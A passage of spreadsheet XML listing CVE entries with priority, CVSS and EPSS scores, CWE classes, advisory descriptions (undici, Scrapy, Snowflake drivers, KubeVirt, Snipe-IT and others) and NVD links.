          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to command execution.</t>
        </is>
      </c>
      <c r="M2924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79963</t>
        </is>
      </c>
    </row>
    <row r="2925">
      <c r="A2925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80133</t>
        </is>
      </c>
      <c r="C2925" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2925" s="5" t="inlineStr"/>
      <c r="F2925" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2925" s="5" t="inlineStr"/>
      <c r="H2925" s="5" t="inlineStr"/>
      <c r="I2925" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2925" s="5" t="inlineStr"/>
      <c r="K2925" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2925" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="M2925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80133</t>
        </is>
      </c>
    </row>
    <row r="2926">
      <c r="A2926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80434</t>
        </is>
      </c>
      <c r="C2926" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2926" s="5" t="inlineStr"/>
      <c r="F2926" s="5" t="inlineStr"/>
      <c r="G2926" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2926" s="5" t="inlineStr"/>
      <c r="I2926" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2926" s="5" t="inlineStr"/>
      <c r="K2926" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2926" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to manipulate runtime caches and cause a denial of service due to an insecure direct object reference.</t>
        </is>
      </c>
      <c r="M2926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80434</t>
        </is>
      </c>
    </row>
    <row r="2927">
      <c r="A2927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81383</t>
        </is>
      </c>
      <c r="C2927" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2927" s="5" t="inlineStr"/>
      <c r="F2927" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2927" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2927" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="I2927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2927" s="5" t="inlineStr"/>
      <c r="K2927" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L2927" s="5" t="inlineStr">
        <is>
          <t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t>
        </is>
      </c>
    </row>
    <row r="2928">
      <c r="A2928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="C2928" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2928" s="5" t="inlineStr"/>
      <c r="F2928" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2928" s="5" t="inlineStr">
        <is>
          <t>microsoft, node.js</t>
        </is>
      </c>
      <c r="H2928" s="5" t="inlineStr"/>
      <c r="I2928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2928" s="5" t="inlineStr"/>
      <c r="K2928" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L2928" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M2928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="2929">
      <c r="A2929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84366</t>
        </is>
      </c>
      <c r="C2929" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2929" s="5" t="inlineStr"/>
      <c r="F2929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2929" s="5" t="inlineStr">
        <is>
          <t>python, aws</t>
        </is>
      </c>
      <c r="H2929" s="5" t="inlineStr"/>
      <c r="I2929" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2929" s="5" t="inlineStr"/>
      <c r="K2929" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L2929" s="5" t="inlineStr">
        <is>
          <t>Scrapy is a high-level web crawling and scraping framework for Python. Prior to 2.17.0, in scrapy/core/downloader/handlers/s3.py, Scrapy's S3DownloadHandler converts an S3-scheme bucket and key request into a plaintext HTTP request to the corresponding S3 endpoint unless request.meta["is_secure"] is explicitly enabled, then signs and sends the plaintext request with configured AWS credentials. A network attacker who can observe traffic between Scrapy and S3 can read the bucket and key path, AWS Authorization header, X-Amz-Security-Token when temporary credentials are used, S3 object contents, and S3 response headers. An active man-in-the-middle attacker can also modify the plaintext S3 response body, status code, and headers before Scrapy processes them, causing scraped-data poisoning, poisoned exports, HTTP cache poisoning when caching is enabled, or influence over later crawl targets through forged redirects or attacker-controlled links. Users making S3-scheme requests with AWS credentials are affected. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="M2929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84366</t>
        </is>
      </c>
    </row>
    <row r="2930">
      <c r="A2930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84961</t>
        </is>
      </c>
      <c r="C2930" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2930" s="5" t="inlineStr"/>
      <c r="F2930" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2930" s="5" t="inlineStr"/>
      <c r="H2930" s="5" t="inlineStr"/>
      <c r="I2930" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2930" s="5" t="inlineStr"/>
      <c r="K2930" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2930" s="5" t="inlineStr">
        <is>
          <t>undici's BalancedPool constructor passes its entire options object through an internal deep-clone that serializes and reparses the value as JSON. Because JSON cannot represent functions, any function-valued TLS option, such as a caller-supplied checkServerIdentity callback or a custom connector inside the connect option, is silently discarded before it reaches the TLS layer. As a result a peer whose certificate the application's custom checkServerIdentity was written to reject, but which still passes Node's default hostname and chain checks, is accepted when reached through BalancedPool. The Client, Pool, and Agent dispatchers are not affected because they extract the connect and tls options before cloning. This affects undici versions from 7.24.1 up to 7.29.1 and from 8.0.0 up to 8.10.2, and only when the application supplies a function-valued connect or tls option to BalancedPool. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M2930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84961</t>
        </is>
      </c>
    </row>
    <row r="2931">
      <c r="A2931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85152</t>
        </is>
      </c>
      <c r="C2931" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2931" s="5" t="inlineStr"/>
      <c r="F2931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2931" s="5" t="inlineStr"/>
      <c r="H2931" s="5" t="inlineStr"/>
      <c r="I2931" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2931" s="5" t="inlineStr"/>
      <c r="K2931" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L2931" s="5" t="inlineStr">
        <is>
          <t>undici 8.10.0 omits the destination origin from the cache and request-deduplication keys when the cache or deduplicate interceptor is composed directly onto a Client or Pool. Because the internal cache key falls back to an empty origin string, a cacheable or in-flight response from one upstream origin is returned for a request to a different, trusted origin whenever the method, path, and relevant headers match, which permits cross-origin information disclosure and persistent cache poisoning. The reporter demonstrated a full authentication bypass in which a JWT signed with an attacker-controlled key was accepted as belonging to a trusted issuer, and the trusted origin was never contacted. This is a regression introduced in 8.10.0 and affects undici versions from 8.10.0 up to 8.10.2. Applications using an Agent, which carries the origin in its dispatch options, are not affected. Users should upgrade to undici 8.10.2.</t>
        </is>
      </c>
      <c r="M2931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85152</t>
        </is>
      </c>
    </row>
    <row r="2932">
      <c r="A2932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85525</t>
        </is>
      </c>
      <c r="C2932" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2932" s="5" t="inlineStr"/>
      <c r="F2932" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2932" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H2932" s="5" t="inlineStr"/>
      <c r="I2932" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2932" s="5" t="inlineStr"/>
      <c r="K2932" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-347</t>
        </is>
      </c>
      <c r="L2932" s="5" t="inlineStr">
        <is>
          <t>Improper OCSP response validation in the Snowflake Python, Go, JDBC, and Node.js drivers allowed a revoked TLS certificate to be accepted as valid, because OCSP responses were not reliably bound to the certificate being validated and definitive verification failures were treated as transient. A man-in-the-middle attacker holding a revoked certificate and its private key for a Snowflake or stage hostname could cause the driver to establish a TLS session to the attacker-controlled endpoint anyway, allowing the attacker to read and modify data transmitted within that connection. Successful exploitation requires that on-path position and the corresponding private key, and impact is limited to data carried within the intercepted connection. The fix is available in Snowflake Connector for Python v4.7.3, Snowflake Go Driver v2.2.0, Snowflake JDBC Driver v4.3.4 (including the snowflake-jdbc-fips and snowflake-jdbc-thin), and Snowflake Node.js Driver v3.3.0. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M2932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85525</t>
        </is>
      </c>
    </row>
    <row r="2933">
      <c r="A2933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86166</t>
        </is>
      </c>
      <c r="C2933" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2933" s="5" t="inlineStr"/>
      <c r="F2933" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2933" s="5" t="inlineStr"/>
      <c r="H2933" s="5" t="inlineStr"/>
      <c r="I2933" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2933" s="5" t="inlineStr"/>
      <c r="K2933" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="L2933" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Tenda HG10 300001138. This issue affects the function formWanRedirect of the file /boaform/formWanRedirect of the component Boa Web Server. Executing a manipulation of the argument if can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M2933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86166</t>
        </is>
      </c>
    </row>
    <row r="2934">
      <c r="A2934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86187</t>
        </is>
      </c>
      <c r="C2934" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2934" s="5" t="inlineStr"/>
      <c r="F2934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2934" s="5" t="inlineStr"/>
      <c r="H2934" s="5" t="inlineStr"/>
      <c r="I2934" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2934" s="5" t="inlineStr"/>
      <c r="K2934" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="L2934" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo generates passwords for external-login accounts using rand() instead of a cryptographic generator, producing only 31-bit integers. Attackers with access to password hashes can recover plaintext passwords in minutes through offline brute-force attacks due to unsalted MD5-based hashing.</t>
        </is>
      </c>
      <c r="M2934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86187</t>
        </is>
      </c>
    </row>
    <row r="2935">
      <c r="A2935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86746</t>
        </is>
      </c>
      <c r="C2935" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2935" s="5" t="inlineStr"/>
      <c r="F2935" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2935" s="5" t="inlineStr"/>
      <c r="H2935" s="5" t="inlineStr"/>
      <c r="I2935" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2935" s="5" t="inlineStr"/>
      <c r="K2935" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2935" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 contains an authorization bypass vulnerability in Livewire components that enforce authorization only at the route level, not within component lifecycle methods. Attackers with a valid authenticated session can replay signed component snapshots via POST /livewire/update to invoke protected methods and escalate privileges, including creating OAuth clients, minting personal access tokens, and accessing sensitive admin data.</t>
        </is>
      </c>
      <c r="M2935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86746</t>
        </is>
      </c>
    </row>
    <row r="2936">
      <c r="A2936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87812</t>
        </is>
      </c>
      <c r="C2936" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2936" s="5" t="inlineStr"/>
      <c r="F2936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2936" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2936" s="5" t="inlineStr"/>
      <c r="I2936" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2936" s="5" t="inlineStr"/>
      <c r="K2936" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2936" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in Bazaar package cards where the iconURL metadata is inserted directly into HTML img src attributes without escaping. Attackers can inject malicious URLs with event handlers that execute JavaScript in the authenticated SiYuan origin when users view Bazaar listings, enabling API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M2936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87812</t>
        </is>
      </c>
    </row>
    <row r="2937">
      <c r="A2937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89161</t>
        </is>
      </c>
      <c r="C2937" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2937" s="5" t="inlineStr"/>
      <c r="F2937" s="5" t="inlineStr"/>
      <c r="G2937" s="5" t="inlineStr"/>
      <c r="H2937" s="5" t="inlineStr"/>
      <c r="I2937" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2937" s="5" t="inlineStr"/>
      <c r="K2937" s="5" t="inlineStr">
        <is>
          <t>CWE-590</t>
        </is>
      </c>
      <c r="L2937" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_jit_match mishandles a previously copied subject being passed in as a context. An incorrect free operation can occur.</t>
        </is>
      </c>
      <c r="M2937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89161</t>
        </is>
      </c>
    </row>
    <row r="2938">
      <c r="A2938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9697</t>
        </is>
      </c>
      <c r="C2938" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2938" s="5" t="inlineStr"/>
      <c r="F2938" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2938" s="5" t="inlineStr"/>
      <c r="H2938" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="I2938" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J2938" s="5" t="inlineStr"/>
      <c r="K2938" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2938" s="5" t="inlineStr">
        <is>
          <t>Impact:
undici's ProxyAgent silently drops the requestTls option when configured with a SOCKS5 proxy URI (socks5:// or socks://). The target HTTPS connection through the SOCKS5 tunnel falls back to Node's default trust store, ignoring user-configured ca, cert, key, rejectUnauthorized, and servername settings.
Applications that pin to an internal or corporate CA via requestTls.ca will, when their proxy URI is SOCKS5, get the default Mozilla CA bundle as the trust anchor instead. Any cert signed by any publicly-trusted CA for the target hostname is accepted, breaking the intended pin and enabling MITM read and tamper of the HTTPS exchange.
Affected applications are those that use undici's ProxyAgent (or Socks5ProxyAgent directly) with SOCKS5 AND rely on requestTls for TLS scope restriction. The bug was introduced in undici 7.23.0 when SOCKS5 support was added.
Patches:
Upgrade to undici v7.28.0 or v8.5.0.
Workarounds:
No workaround is available within the SOCKS5 path. If a SOCKS5 proxy with TLS scope restriction is required and an upgrade is not yet possible, route the traffic through an HTTP-proxy ProxyAgent instead, where requestTls is honored correctly.</t>
        </is>
      </c>
      <c r="M2938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9697</t>
        </is>
      </c>
    </row>
    <row r="2939">
      <c r="A2939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2939" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15679</t>
        </is>
      </c>
      <c r="C2939" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2939" s="5" t="inlineStr"/>
      <c r="F2939" s="5" t="inlineStr"/>
      <c r="G2939" s="5" t="inlineStr"/>
      <c r="H2939" s="5" t="inlineStr"/>
      <c r="I2939" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2939" s="5" t="inlineStr"/>
      <c r="K2939" s="5" t="inlineStr">
        <is>
          <t>CWE-258</t>
        </is>
      </c>
      <c r="L2939" s="5" t="inlineStr">
        <is>
          <t>Under certain circumstances such as reset to factory default operation, the BMC root account is made active without a password.</t>
        </is>
      </c>
      <c r="M2939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15679</t>
        </is>
      </c>
    </row>
    <row r="2940">
      <c r="A2940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2940" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-54518</t>
        </is>
      </c>
      <c r="C2940" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2940" s="5" t="inlineStr"/>
      <c r="F2940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2940" s="5" t="inlineStr"/>
      <c r="H2940" s="5" t="inlineStr"/>
      <c r="I2940" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="J2940" s="5" t="inlineStr"/>
      <c r="K2940" s="5" t="inlineStr">
        <is>
          <t>CWE-1189, CWE-1220</t>
        </is>
      </c>
      <c r="L2940" s="5" t="inlineStr">
        <is>
          <t>Improper isolation of shared resources within the CPU operation cache on Zen 2-based products could allow an attacker to corrupt instructions executed at a different privilege level, potentially resulting in privilege escalation.</t>
        </is>
      </c>
      <c r="M2940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-54518</t>
        </is>
      </c>
    </row>
    <row r="2941">
      <c r="A2941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11837</t>
        </is>
      </c>
      <c r="C2941" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2941" s="5" t="inlineStr"/>
      <c r="F2941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2941" s="5" t="inlineStr"/>
      <c r="H2941" s="5" t="inlineStr"/>
      <c r="I2941" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J2941" s="5" t="inlineStr"/>
      <c r="K2941" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2941" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability was found in the ansible.posix authorized_key module. The module's keyfile() function uses os.chown() instead of os.lchown() and opens files without O_NOFOLLOW when managing SSH authorized keys. An unprivileged local user can pre-stage symbolic links in their ~/.ssh directory to redirect file ownership changes to arbitrary system paths when an operator runs the authorized_key task as root, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="M2941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11837</t>
        </is>
      </c>
    </row>
    <row r="2942">
      <c r="A2942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13201</t>
        </is>
      </c>
      <c r="C2942" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2942" s="5" t="inlineStr"/>
      <c r="F2942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2942" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2942" s="5" t="inlineStr">
        <is>
          <t>kubevirt:kubevirt, redhat:openshift_virtualization</t>
        </is>
      </c>
      <c r="I2942" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2942" s="5" t="inlineStr"/>
      <c r="K2942" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="L2942" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in KubeVirt's safepath package used by virt-handler. The OpenAtNoFollow function uses O_PATH|O_NOFOLLOW to obtain a file descriptor to a path leaf, but downstream operations resolve the path via /proc/self/fd/N using link-following syscalls. When the leaf is a symlink, the kernel dereferences it, defeating the intended no-follow protection. An attacker with access to a virt-launcher pod can exploit this to redirect virt-handler's IPC socket connections, including the notify socket used for VM domain lifecycle events. By hijacking this socket, the attacker can inject arbitrary domain events into virt-handler, causing it to take incorrect lifecycle actions, corrupt VM state in the Kubernetes API, or crash — resulting in sustained denial of VM management services for all virtual machines on the affected node. Additionally, the same symlink following flaw allows virt-handler to apply file ownership or permission changes to unintended host paths.</t>
        </is>
      </c>
      <c r="M2942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13201</t>
        </is>
      </c>
    </row>
    <row r="2943">
      <c r="A2943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15431</t>
        </is>
      </c>
      <c r="C2943" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2943" s="5" t="inlineStr"/>
      <c r="F2943" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2943" s="5" t="inlineStr"/>
      <c r="H2943" s="5" t="inlineStr"/>
      <c r="I2943" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2943" s="5" t="inlineStr"/>
      <c r="K2943" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L2943" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability has been identified in the HP Support
 Assistant for versions prior to 9.53.2.0. The vulnerability
               could potentially allow a local attacker to escalate 
privileges due to insufficient access controls.</t>
        </is>
      </c>
      <c r="M2943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15431</t>
        </is>
      </c>
    </row>
    <row r="2944">
      <c r="A2944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18058</t>
        </is>
      </c>
      <c r="C2944" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2944" s="5" t="inlineStr"/>
      <c r="F2944" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2944" s="5" t="inlineStr"/>
      <c r="H2944" s="5" t="inlineStr"/>
      <c r="I2944" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2944" s="5" t="inlineStr"/>
      <c r="K2944" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2944" s="5" t="inlineStr">
        <is>
          <t>The mobile Smart Connect dashboard UI was subject to manipulation
by 3rd party apps. When paired with a phishing attack, this manipulation could
result in escalated privileges of an attacker within the system.</t>
        </is>
      </c>
      <c r="M2944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18058</t>
        </is>
      </c>
    </row>
    <row r="2945">
      <c r="A2945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18755</t>
        </is>
      </c>
